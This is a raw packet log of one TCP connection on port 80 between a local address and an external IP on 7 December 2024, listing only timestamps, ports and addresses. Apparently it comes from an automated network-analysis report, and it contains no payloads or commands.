Dec 7, 2024 15:47:46.562762022 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.563975096 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.564033031 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.564141989 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.564209938 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.565391064 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.565452099 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.565466881 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.565506935 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.566709995 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.566792965 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.566832066 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.568034887 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.568114996 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.568182945 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.568228960 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.569365978 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.569427967 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.569493055 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.569535971 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.570744991 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.570797920 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.570879936 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.570976973 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.572180033 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.572238922 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.572263956 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.572302103 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.573461056 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.573503017 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.573514938 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.573548079 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.574794054 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.574805975 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.574851036 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.574875116 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.576159000 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.576278925 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.576327085 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.577533007 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.577559948 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.577583075 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.577606916 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.578850985 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.579021931 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.579071045 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.580195904 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.580245018 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.580282927 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.580327034 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.581505060 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.581547022 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.581605911 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.581649065 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.582887888 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.582964897 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.583014965 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.584103107 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.584151030 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.584223032 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.584271908 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.585371017 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.585417986 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.585475922 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.585661888 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.586563110 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.586673021 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.586716890 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.587780952 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.587831020 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.587858915 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.587907076 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.589001894 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.589085102 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.589116096 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.589155912 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.590239048 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.590403080 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.590449095 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.591507912 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.591553926 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.591573000 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.591614008 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.592634916 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.592760086 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.592808008 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.593993902 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.594042063 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.594130039 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.595362902 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.595412016 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.595437050 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.595477104 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.596623898 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.596667051 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.596688032 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.596724033 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.597645044 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.597692013 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.597771883 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.597811937 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.598766088 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.598879099 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.598927021 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.600028992 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.600075960 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.600085974 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.600126028 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.601383924 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.601429939 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.601449966 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.601491928 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.602474928 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.602543116 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.602586985 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.603646040 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.603696108 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.603765965 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.603816986 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.604875088 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.604921103 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.604993105 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.605046988 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.606097937 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.606151104 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.606208086 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.607323885 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.607372046 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.644707918 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.644754887 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.644835949 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.645034075 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.645080090 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.645159960 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.645199060 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.646333933 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.646377087 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.646440983 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.646476030 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.647497892 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.647607088 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.647654057 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.648730040 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.648782969 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.648878098 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.648931026 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.649936914 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.649986982 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.650036097 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.650079012 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.651145935 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.651277065 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.651330948 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.652375937 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.652431011 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.652486086 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.652652979 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.653597116 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.653651953 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.653743029 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.653835058 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.654819012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.654906034 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.654936075 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.654990911 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.656063080 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.656179905 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.656224012 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.657257080 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.657308102 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.657368898 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.657409906 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.658538103 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.658586979 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.658643007 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.658684015 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.659715891 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.659764051 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.659820080 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.659858942 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.661062002 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.661112070 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.661156893 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.662131071 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.662178040 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.662349939 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.662395000 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.663355112 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.663400888 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.663480043 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.663522959 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.664586067 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.664655924 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.664704084 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.665854931 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.665904045 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.665924072 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.665963888 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.667030096 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.667081118 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.667149067 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.667191982 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.668243885 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.668370962 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.668416977 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.669478893 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.669523954 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.669574976 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.669615984 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.670695066 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.670739889 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.670783043 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.670825005 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.671993971 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.672040939 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.672096014 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.673147917 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.673198938 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.673221111 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.673259020 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.674365997 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.674412966 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.674460888 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.674499989 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.675584078 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.675626993 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.675642014 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.675683022 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.676945925 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.677092075 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.677138090 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.678025007 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.678076029 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.678137064 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.678178072 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.679250002 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.679292917 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.679363966 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.679405928 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.680459976 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.680572987 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.680617094 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.681699991 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.681746006 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.681834936 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.681885958 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.682912111 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.682962894 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.683006048 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.683046103 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.684119940 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.684226990 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.684273958 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.685353994 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.685399055 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.685446024 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.685486078 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.686687946 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.686803102 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.686849117 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.687817097 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.687865973 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.687900066 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.687935114 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.689014912 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.689091921 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.689140081 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.690227985 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.690272093 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.690335989 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.690376043 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.691468000 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.691512108 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.691589117 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.691629887 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.692666054 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.692776918 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.692823887 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.693941116 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.693989038 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.694040060 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.694087982 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.695192099 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.695236921 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.695270061 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.695322037 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.696393967 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.696440935 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.696527004 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.696578026 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.697613001 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.697679996 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.697712898 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.697756052 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.698790073 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.698833942 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.698923111 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.698973894 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.699996948 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.700037956 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.700107098 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.700167894 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.701303005 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.701351881 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.701390982 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.701436043 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.702446938 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.702496052 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.702550888 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.702596903 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.703649044 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.703695059 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.703799963 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.703846931 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.704891920 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.704940081 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.705022097 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.705070972 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.706167936 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.706214905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.706269026 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.706312895 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.707627058 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.707699060 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.707700968 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.707741022 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.708515882 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.708561897 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.836987019 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.837025881 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.837042093 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.837076902 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.837102890 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.837452888 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.837502956 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.837519884 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.837532997 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.837558031 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.837577105 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.838390112 CET	80	49706	107.175.113.196	192.168.2.5
